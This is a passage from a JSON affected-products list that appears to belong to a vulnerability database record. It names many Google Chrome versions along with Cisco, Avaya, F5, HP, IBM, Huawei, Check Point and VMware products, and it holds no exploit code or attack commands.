server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1021.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.462.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.77" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.51" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.818.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.645.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.4" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.1.1539" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1065.0" }, { "model": "database appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2" }, { "model": "storeever esl g3 tape library 663h gs04601", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.674.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.39" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57350" }, { "model": "hyper-scale manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.905.0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "gaia r71.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.84" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.34024" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1040.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "secureplatform r77", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.758.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.116" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.184" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.344" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.419.0" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.608.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.40" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.675.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.124" }, { "model": "high-density server dh620 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.9" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1072.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.102" }, { "model": "oceanstor s2600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.435.0" }, { "model": "oceanstor vtl6000 v100r003c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.215" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.617.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.9" }, { "model": "storeever esl g3 tape library 655h gs10201", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.64" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.685.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.312" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.30" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.699.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.961.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.202" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75300" }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.341" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.57" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1058" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1054" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.506.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.16" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.168" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.35" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.703.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.744.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "configuration and orchestration manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.74" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75450" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1078.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.328.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.91" }, { "model": "sig9800 sig9800-x16 v300r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.381.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.144" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1283.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.25" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.711.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.330" }, { "model": "automation insight", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.21" }, { "model": "vcenter log insight", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "ios-xe for asr1k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.147" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.797.0" }, { "model": "secureplatform r75.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oic v100r001c00spc403", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.14443" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.521.0" }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.46" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.774.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.2" }, { "model": "business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.803.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.623.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.51" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.21" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.49" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.345.0" }, { "model": "secureplatform r71.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.215" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.859.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1674.1" }, { "model": "business service automation essentials", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.930.0" }, { "model": "starter kit for cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.562.0" }, { "model": "gaia embedded r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.798.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.227" }, { "model": "oceanstor s2600t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.302" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.59" }, { "model": "dc health check", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.85" }, { "model": "enterprise linux long life 5.9.server", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.111" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7855" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.647.0" }, { "model": "uma v200r001c00spc202", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.937.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.26" }, { "model": "gaia embedded r75", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor s5800t v200r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.71" }, { "model": "gss 4492r global site selector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.30" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.136" }, { "model": "t510 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.867.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.120" }, { "model": "gaia r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.329" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.25" }, { "model": "rack server rh2285 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.746.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.70" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.1" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 